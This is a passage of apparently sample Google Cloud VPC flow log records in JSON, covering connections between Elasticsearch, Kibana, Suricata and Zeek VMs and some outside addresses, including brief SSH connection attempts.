+{"insertId":"19im82tfdygzoc","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.73.186.17","dest_port":22,"protocol":6,"src_ip":"192.168.2.12","src_port":44128},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"infraops-docker-data","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:45:22.318564382Z","packets_sent":"2","reporter":"DEST","src_location":{"asn":4837,"city":"Binzhou","continent":"Asia","country":"chn","region":"Shandong"},"start_time":"2019-06-14T03:45:22.080963433Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzof","jsonPayload":{"bytes_sent":"266531","connection":{"dest_ip":"67.43.156.13","dest_port":33542,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108524Z","packets_sent":"253","reporter":"SRC","rtt_msec":"173","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150870105Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznr","jsonPayload":{"bytes_sent":"65184","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33560},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565026127Z","packets_sent":"358","reporter":"DEST","rtt_msec":"116","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:06.076060079Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznx","jsonPayload":{"bytes_sent":"319459","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33564},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.597079770Z","packets_sent":"180","reporter":"DEST","rtt_msec":"340","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.866944869Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzo7","jsonPayload":{"bytes_sent":"519100","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"192.168.2.177","src_port":60110},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:46.020466750Z","packets_sent":"224","reporter":"DEST","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"suricata-iowa","zone":"us-central1-a"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:10.874529937Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygznb","jsonPayload":{"bytes_sent":"139513","connection":{"dest_ip":"67.43.156.13","dest_port":33550,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565108649Z","packets_sent":"243","reporter":"SRC","rtt_msec":"250","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:02.143811431Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"19im82tfdygzne","jsonPayload":{"bytes_sent":"0","connection":{"dest_ip":"10.139.99.242","dest_port":22,"protocol":6,"src_ip":"67.43.156.14","src_port":41822},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:40.058226439Z","packets_sent":"8","reporter":"DEST","rtt_msec":"1439","src_location":{"asn":4837,"city":"Shangqiu","continent":"Asia","country":"chn","region":"Henan"},"start_time":"2019-06-14T03:40:12.068494835Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.553477088Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.553477088Z"} +{"insertId":"1gq7q7afe373fw","jsonPayload":{"bytes_sent":"11109","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33572},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"105","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373et","jsonPayload":{"bytes_sent":"173496","connection":{"dest_ip":"67.43.156.13","dest_port":33970,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821154389Z","packets_sent":"81","reporter":"SRC","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373f4","jsonPayload":{"bytes_sent":"182861","connection":{"dest_ip":"10.87.40.76","dest_port":33536,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"245","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373eo","jsonPayload":{"bytes_sent":"12145","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33570},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"94","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fb","jsonPayload":{"bytes_sent":"178669","connection":{"dest_ip":"67.43.156.13","dest_port":65319,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"634","reporter":"SRC","rtt_msec":"62","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fs","jsonPayload":{"bytes_sent":"62066","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33540},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.789258875Z","packets_sent":"359","reporter":"SRC","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:39:59.500483335Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ei","jsonPayload":{"bytes_sent":"13440","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":33970},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821056075Z","packets_sent":"96","reporter":"DEST","rtt_msec":"308","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.470006631Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ez","jsonPayload":{"bytes_sent":"368131","connection":{"dest_ip":"67.43.156.13","dest_port":33966,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:50.800931420Z","packets_sent":"76","reporter":"SRC","rtt_msec":"0","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:20.510698570Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fh","jsonPayload":{"bytes_sent":"66258","connection":{"dest_ip":"67.43.156.14","dest_port":9200,"protocol":6,"src_ip":"10.87.40.76","src_port":33536},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:59.565319136Z","packets_sent":"365","reporter":"SRC","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.150282980Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373es","jsonPayload":{"bytes_sent":"76976","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65276},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220621567Z","packets_sent":"749","reporter":"DEST","rtt_msec":"156","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760349279Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fu","jsonPayload":{"bytes_sent":"72967","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65319},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220617595Z","packets_sent":"747","reporter":"DEST","rtt_msec":"62","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:39:59.740597880Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373f2","jsonPayload":{"bytes_sent":"1464","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":50364},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"9","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ee","jsonPayload":{"bytes_sent":"1784","connection":{"dest_ip":"67.43.156.13","dest_port":50364,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:40:08.797851544Z","packets_sent":"8","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.412738626Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ey","jsonPayload":{"bytes_sent":"1457","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.13","src_port":33126},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373e7","jsonPayload":{"bytes_sent":"73215","connection":{"dest_ip":"10.139.99.242","dest_port":9200,"protocol":6,"src_ip":"67.43.156.13","src_port":65318},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:56.220599950Z","packets_sent":"747","reporter":"DEST","rtt_msec":"96","src_location":{"asn":33652,"city":"Broomfield","continent":"America","country":"usa","region":"Colorado"},"start_time":"2019-06-14T03:40:00.760345858Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373f8","jsonPayload":{"bytes_sent":"1781","connection":{"dest_ip":"67.43.156.13","dest_port":53096,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:43:20.813699795Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:43:20.700692281Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ec","jsonPayload":{"bytes_sent":"176465","connection":{"dest_ip":"10.87.40.76","dest_port":33570,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821302149Z","packets_sent":"65","reporter":"DEST","rtt_msec":"1","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466779642Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373f5","jsonPayload":{"bytes_sent":"1776","connection":{"dest_ip":"67.43.156.13","dest_port":33126,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:44:50.919744677Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:44:50.809605761Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373f6","jsonPayload":{"bytes_sent":"1458","connection":{"dest_ip":"10.87.40.76","dest_port":5601,"protocol":6,"src_ip":"67.43.156.14","src_port":56478},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:47:20.566586739Z","packets_sent":"7","reporter":"DEST","rtt_msec":"36","src_location":{"asn":15169,"continent":"America","country":"usa"},"start_time":"2019-06-14T03:47:20.450631492Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fo","jsonPayload":{"bytes_sent":"32764","connection":{"dest_ip":"67.43.156.14","dest_port":52430,"protocol":6,"src_ip":"10.139.99.242","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-central1","vm_name":"zeek-nsm","zone":"us-central1-a"},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:53.081386115Z","packets_sent":"228","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:07.968717244Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373ek","jsonPayload":{"bytes_sent":"1780","connection":{"dest_ip":"67.43.156.13","dest_port":34536,"protocol":6,"src_ip":"10.87.40.76","src_port":5601},"dest_location":{"asn":15169,"continent":"America","country":"usa"},"end_time":"2019-06-14T03:47:51.162931667Z","packets_sent":"7","reporter":"SRC","rtt_msec":"36","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:47:51.050074134Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us-east1-b","project_id":"my-sample-project","subnetwork_id":"758019854043528829","subnetwork_name":"default"},"type":"gce_subnetwork"},"timestamp":"2019-06-14T03:50:17.76361854Z"} +{"insertId":"1gq7q7afe373fj","jsonPayload":{"bytes_sent":"137855","connection":{"dest_ip":"10.87.40.76","dest_port":33572,"protocol":6,"src_ip":"67.43.156.14","src_port":9200},"dest_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"kibana","zone":"us-east1-b"},"dest_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"end_time":"2019-06-14T03:49:51.821291282Z","packets_sent":"72","reporter":"DEST","rtt_msec":"2","src_instance":{"project_id":"my-sample-project","region":"us-east1","vm_name":"elasticsearch","zone":"us-east1-b"},"src_location":{"asn":15169,"continent":"America","country":"usa"},"src_vpc":{"project_id":"my-sample-project","subnetwork_name":"default","vpc_name":"default"},"start_time":"2019-06-14T03:40:08.466742414Z"},"logName":"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows","receiveTimestamp":"2019-06-14T03:50:17.76361854Z","resource":{"labels":{"location":"us